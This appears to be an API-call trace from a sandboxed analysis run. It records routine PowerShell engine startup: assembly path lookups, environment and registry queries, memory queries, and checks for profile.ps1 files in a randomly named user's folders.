	[0147.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.040] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0147.042] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0147.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.042] CoTaskMemFree (pv=0x1b7a3d10) 
	[0147.045] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0147.052] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0147.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.053] CoTaskMemFree (pv=0x1b7a3d10) 
	[0147.053] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0147.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.053] CoTaskMemFree (pv=0x1b7a3d10) 
	[0147.054] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0147.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.054] CoTaskMemFree (pv=0x1b7a3d10) 
	[0147.056] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0147.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.056] CoTaskMemFree (pv=0x1b7a3d10) 
	[0147.059] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0147.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.059] CoTaskMemFree (pv=0x1b7a3d10) 
	[0147.060] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0147.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.060] CoTaskMemFree (pv=0x1b7a3d10) 
	[0147.165] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0147.166] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0147.362] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0147.366] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0147.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.366] CoTaskMemFree (pv=0x1b7a3d10) 
	[0147.935] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b7a4150
	[0147.938] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b7a4260
	[0148.588] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.829] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.831] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.831] VirtualQuery (in: lpAddress=0x14a0e0, lpBuffer=0x14afa0, dwLength=0x30 | out: lpBuffer=0x14afa0*(BaseAddress=0x14a000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.865] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.865] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.865] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.865] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.865] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.866] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.866] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.866] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.866] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.866] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.866] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.866] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.866] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.867] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.867] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.867] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.867] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.867] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.867] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.867] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.867] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.868] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.868] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.868] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.868] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.868] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.868] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.868] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.868] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.869] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0148.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.870] CoTaskMemFree (pv=0x1b7a4370) 
	[0148.960] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0148.960] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.960] CoTaskMemFree (pv=0x1b7a4370) 
	[0148.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.105] VirtualQuery (in: lpAddress=0x14b940, lpBuffer=0x14c800, dwLength=0x30 | out: lpBuffer=0x14c800*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.112] VirtualQuery (in: lpAddress=0x14b940, lpBuffer=0x14c800, dwLength=0x30 | out: lpBuffer=0x14c800*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.113] VirtualQuery (in: lpAddress=0x14b190, lpBuffer=0x14c050, dwLength=0x30 | out: lpBuffer=0x14c050*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.113] VirtualQuery (in: lpAddress=0x14b190, lpBuffer=0x14c050, dwLength=0x30 | out: lpBuffer=0x14c050*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.114] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d798 | out: phkResult=0x14d798*=0x3a0) returned 0x0
	[0149.114] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d71c, lpData=0x0, lpcbData=0x14d718*=0x0 | out: lpType=0x14d71c*=0x1, lpData=0x0, lpcbData=0x14d718*=0x56) returned 0x0
	[0149.114] CoTaskMemAlloc (cb=0x5a) returned 0x1b7eac80
	[0149.114] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d6ec, lpData=0x1b7eac80, lpcbData=0x14d6e8*=0x56 | out: lpType=0x14d6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d6e8*=0x56) returned 0x0
	[0149.114] CoTaskMemFree (pv=0x1b7eac80) 
	[0149.114] RegCloseKey (hKey=0x3a0) returned 0x0
	[0149.114] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d798 | out: phkResult=0x14d798*=0x3a0) returned 0x0
	[0149.114] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d71c, lpData=0x0, lpcbData=0x14d718*=0x0 | out: lpType=0x14d71c*=0x1, lpData=0x0, lpcbData=0x14d718*=0x56) returned 0x0
	[0149.114] CoTaskMemAlloc (cb=0x5a) returned 0x1b7eac80
	[0149.115] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d6ec, lpData=0x1b7eac80, lpcbData=0x14d6e8*=0x56 | out: lpType=0x14d6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d6e8*=0x56) returned 0x0
	[0149.115] CoTaskMemFree (pv=0x1b7eac80) 
	[0149.115] RegCloseKey (hKey=0x3a0) returned 0x0
	[0149.120] CoTaskMemAlloc (cb=0x20c) returned 0x1b7c7790
	[0149.120] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7c7790 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0149.121] CoTaskMemFree (pv=0x1b7c7790) 
	[0149.121] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0149.122] CoTaskMemAlloc (cb=0x20c) returned 0x1b7c7790
	[0149.122] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7c7790 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0149.122] CoTaskMemFree (pv=0x1b7c7790) 
	[0149.122] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0149.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0149.123] SetErrorMode (uMode=0x1) returned 0x1
	[0149.123] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d700 | out: lpFileInformation=0x14d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0149.123] SetErrorMode (uMode=0x1) returned 0x1
	[0149.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0149.123] SetErrorMode (uMode=0x1) returned 0x1
	[0149.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d700 | out: lpFileInformation=0x14d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0149.124] SetErrorMode (uMode=0x1) returned 0x1
	[0149.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0149.124] SetErrorMode (uMode=0x1) returned 0x1
